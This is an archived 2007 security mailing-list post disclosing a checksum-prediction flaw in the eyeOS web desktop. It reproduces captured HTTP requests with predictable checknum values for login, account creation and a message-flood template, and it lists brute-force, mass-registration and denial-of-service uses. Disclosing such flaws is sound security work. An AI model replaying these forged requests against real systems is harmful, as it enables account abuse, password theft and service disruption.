Hosting Provided By

eyeOS checksum prediction

From: <komarov(at)itdefence.ru>
Date: Mon Aug 27 2007 - 14:48:21 EDT

Subject: eyeOS checksum prediction
Author: Andrej Komarov (komarov@itdefence.ru)

eyeOS operates with special intermediate checksums in plaintext. Without its validation it is impossible to make new actions (to login, start new services). There is way to predict eyeOS checksum. If it is automated from hackers side, it will make local Denial Of Service atack or user password stealing.

GET / HTTP/1.1 >>>>>>> <body onload='sendMsg("758474843719")
POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1 >>>>>>> HTTP/1.1 200 OK Date: Mon, 27 Aug 2007 18:58:21 GMT Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=10, max=10 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/xml

21db





	<task>createWidget</task>
	<position>

		0
		0
		0
		0


	<checknum>876029936871</checknum> (!) 
	<name>47631_wnd1</name>
	<father>eyeApps</father>

... widgets generation

POST /index.php?checknum=876029936871&msg=doLogin HTTP/1.1 (!) Host: demo.eyeos.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; Referer: http://demo.eyeos.org/
Content-Length: 117
Cookie: PHPSESSID=ad92920e4ab606df75b28702255a87c8 Pragma: no-cache
Cache-Control: no-cache

params=%3CeyeLogin_Username%3Edemo23%3C%2FeyeLogin_Username%3E%3CeyeLogin_Password%3Edemo23%3C%2FeyeLogin_Password%3E

Do you need help?

POST /index.php?checknum=876029936871&msg=successLogin HTTP/1.1 Host: demo.eyeos.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; Referer: http://demo.eyeos.org/
Content-Length: 7
Cookie: PHPSESSID=ad92920e4ab606df75b28702255a87c8 Pragma: no-cache
Cache-Control: no-cache

>>> <checknum>749058867402</checknum>

POST /index.php?checknum=432461038814&msg=Launch HTTP/1.1

POST /index.php?checknum=432461038814&msg=App_Clicked HTTP/1.1

On this method is based possible atacks:

mass user registration
bruteforce atacks
flood atacks on eyeBoard service like:

POST /index.php?checknum=PREDICTID_checksum&msg=addMsg HTTP/1.1 params=%3Capp%3EeyeBoard%3C%2Fapp%3E
with additional values : params=%3CMessageB%3EYOUR_MESSAGE%3C%2FMessageB%3E

POST /index.php?checknum=326420826018&msg=doCreateUser HTTP/1.1 Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; Referer: http://127.0.0.1:8080/
Content-Length: 161
Cookie: PHPSESSID=r9vivth7896gtbaj6bst0nlen7 Pragma: no-cache
Cache-Control: no-cache

params=%3CeyeLogin_newUser%3ESHALOMA%3C%2FeyeLogin_newUser%3E%3CeyeLogin_Pass1%3Eshaloma%3C%2FeyeLogin_Pass1%3E%3CeyeLogin_Pass2%3Eshaloma%3C%2FeyeLogin_Pass2%3E

Do you need more help?

POST /index.php?checknum=284626275746&msg=doLogin HTTP/1.1 Accept: */*
Accept-Language: ru
Referer: http://127.0.0.1:8080/index.php Content-Type: application/x-www-form-urlencoded; Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706) Host: 127.0.0.1:8080
Content-Length: 105
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=sa3erabjgpcqnfn4k8eutgark0

params=%3CeyeLogin_Username%3E%3C%2FeyeLogin_Username%3E%3CeyeLogin_Password%3E%3C%2FeyeLogin_Password%3E Received on Mon Aug 27 16:35:08 2007

This message: [ Message body ]
Next message: Amit Klein: "BIND 8 EOL and BIND 8 DNS Cache Poisoning (Amit Klein, Trusteer)"
Previous message: 3APA3A: "Re: n.runs-SA-2007.027 - Sophos Antivirus UPX parsing Arbitrary CodeExecution Advisory"
Next in thread: jose(at)eyeos.org: "Re: eyeOS checksum prediction"
Maybe reply: jose(at)eyeos.org: "Re: eyeOS checksum prediction"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:13:40 EDT